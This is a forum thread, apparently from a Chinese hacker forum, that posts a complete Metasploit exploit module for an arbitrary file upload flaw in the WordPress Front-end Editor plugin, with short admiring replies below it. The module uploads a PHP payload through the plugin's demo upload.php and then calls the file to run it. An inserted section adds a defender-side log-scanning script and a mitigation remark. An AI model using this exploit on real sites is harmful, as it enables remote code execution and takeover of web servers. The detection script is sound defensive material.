90_ posted on 2015-6-18 20:41:51

Wordpress Front-end Editor upload vulnerability

Description:
The Wordpress Front-end Editor plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder; because the plugin also uses its own file upload mechanism instead of the WordPress API, it's possible to upload any file type.


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Wordpress Front-end Editor File Upload',
      'Description'    => %q{
          The Wordpress Front-end Editor plugin contains an authenticated file upload
          vulnerability. We can upload arbitrary files to the upload folder, because
          the plugin also uses it's own file upload mechanism instead of the wordpress
          api it's possible to upload any file type.
      },
      'Author'         =>
        [
          'Sammy', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespretogmail.com>'   # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '83637'],
          ['WPVDB', '7569'],
          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Front-End Editor 2.2.1', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 04 2012'))
  end

  def check
    check_plugin_version_from_readme('front-end-editor', '2.3')
  end

  def exploit
    print_status("#{peer} - Trying to upload payload")
    filename = "#{rand_text_alpha_lower(5)}.php"

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'  => 'POST',
      'uri'     => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'),
      'ctype'   => 'application/octet-stream',
      'headers' => {
        'X-File-Name' => "#{filename}"
      },
      'data'    => payload.encoded
    )

    if res
      if res.code == 200
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      { 'uri' => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") },
      5
    )
  end
end
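Added example, not part of the original post or of the Metasploit project: a defender-side access-log check for the request pattern the module above produces (a POST to the demo upload.php, then a request for another PHP file in the same demo directory). It assumes Apache/Nginx "combined" log format; the names scan, DEMO_DIR and LINE_RE are hypothetical and the log lines are constructed samples.

```ruby
# Directory the module posts to and later requests the dropped file from.
DEMO_DIR = %r{/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/}i
# Combined log format: ip ident user [time] "METHOD uri proto" status size ...
LINE_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) /

# Constructed sample log (documentation IP ranges, made-up timestamps and file name).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2210 "-" "-"
  203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/upload.php HTTP/1.1" 200 12 "-" "-"
  203.0.113.7 - - [01/Jan/2024:10:00:10 +0000] "GET /wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/qzkfw.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.9 - - [01/Jan/2024:10:05:00 +0000] "GET /wp-content/plugins/front-end-editor/readme.txt HTTP/1.1" 200 4100 "-" "-"
  198.51.100.9 - - [01/Jan/2024:10:06:00 +0000] "GET /wp-content/plugins/front-end-editor/lib/aloha-editor/plugins/extra/draganddropfiles/demo/index.html HTTP/1.1" 404 0 "-" "-"
LOG

# Returns one hash per suspicious request, in log order.
def scan(log)
  findings = []
  uploaders = {} # client ip -> time of its POST to upload.php
  log.each_line do |line|
    m = LINE_RE.match(line)
    next unless m # skip lines that are not in combined format
    ip, time, method, uri, status = m.captures
    path = uri.split('?', 2).first
    next unless path =~ DEMO_DIR
    file = File.basename(path)
    if method == 'POST' && file.casecmp?('upload.php')
      # The X-File-Name header is not in default access logs, so the
      # uploaded name is unknown here; record the client for correlation.
      uploaders[ip] = time
      findings << { type: :upload_endpoint_post, ip: ip, time: time,
                    status: status.to_i, path: path }
    elsif file =~ /\.ph(p\d?|tml)\z/i && !file.casecmp?('upload.php')
      # Any other PHP file served from the demo directory is unexpected.
      findings << { type: :script_in_demo_dir, ip: ip, time: time,
                    status: status.to_i, path: path,
                    same_client_uploaded: uploaders.key?(ip) }
    end
  end
  findings
end

scan(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

On the mitigation side, the module's check method treats plugin versions below 2.3 as affected, and denying script execution in the plugin's demo directory at the web-server level removes the second stage regardless of version.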

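我叫齐齐 posted on 2015-6-19 19:01:39

This looks really advanced.

ruguoruo posted on 2015-6-26 23:05:23

Thanks to the original poster for sharing~

Sty,涛 posted on 2015-6-27 09:52:56

Support the Honker Union of China (ihonker.org)

ruguoruo posted on 2015-6-27 13:53:58

Support the Honker Union of China (ihonker.org)

小路 posted on 2015-6-28 02:09:41

Thanks to the original poster for sharing~

小路 posted on 2015-6-28 06:02:08

Learning the technique, keep it up!

r00tc4 posted on 2015-6-28 23:24:23

Learning the technique, keep it up!

Jack-5 posted on 2015-6-29 05:32:16

Learning the technique, keep it up!

云游者 posted on 2015-6-30 00:22:37

Pretty good, bumping this.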